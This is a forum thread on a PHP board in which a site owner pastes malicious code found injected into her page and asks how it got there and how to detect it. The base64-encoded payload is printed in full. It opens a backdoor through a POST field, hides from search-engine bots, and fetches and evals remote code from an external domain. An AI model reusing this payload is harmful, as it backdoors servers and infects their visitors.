作者wangshowp (辰修)
看板PHP
标题[请益] 网页被嵌入iframe-inf
时间Tue Jun 26 10:54:11 2012
请问各位大大
小妹的网页在一开始<?php後被被嵌入如下字串
/*68066*/ error_reporting(0); @ini_set('error_log',NULL);
@ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval(
base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaWYgKGlzc2V0KCRfUE9TVFsnY29va2llc19pJ10pKSB7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnY29va2llc19pJ10pKTt9CiR6Mzc9InN0YXRzIjsKJHVhMz0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiR1MzcgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJNYWMiKTsKaWYoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICR1MzcpIC4gIi9pIiwgJHVhMykpIG9yIChpc3NldCgkX1NFUlZFUlsiSFRUUF9DT09LSUUiXSkpICBvciAoaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9
BR0VOVCJdKSA9PTApICkKe30KZWxzZQp7CkBzZXRjb29raWUoJHozNyxtZDUoInN0YXRzIiksdGltZSgpKzE3MjgwMCk7CiR1cmwgPSAiaHR0cDovLzQwNDBlbnQuY29tL3Nlc3Npb24ucGhwP2lkIjsKJGlmcmFtZT1AZXZhbChmaWxlX2dldF9jb250ZW50cyAoJHVybCkpOwppZiAoJGlmcmFtZSkgZWNobygkaWZyYW1lKTsgCgp9Cg'));/*68066*/
?><?php
导致网页会解析成iframe-inf病毒
但我不晓得是如何被嵌入的,是否有方法可以检测?或者预防?
--
※ 发信站: 批踢踢实业坊(ptt.cc)
◆ From: 140.125.86.27
1F:推 LaPass:简单来讲,被骇了 06/26 11:00
2F:→ kerash:不知道中间被处理了甚麽,总之最後会被转介到google 06/26 11:46
3F:→ twsphere:4040ent.com 这是你家的??还是? 06/26 12:58
4F:→ wangshowp:不是我家>"<~会被转到GOOGLE? 06/26 21:53
5F:→ kerash:转到GOOGLE是最後一步,在iframe中被转的 06/26 22:19
6F:→ kerash:实际上中途还转介两次网站,其中一个功能好像是把spider或 06/26 22:19
7F:→ kerash:robot在爬资料时,使他没功能,等於你网站不会被google纪录 06/26 22:20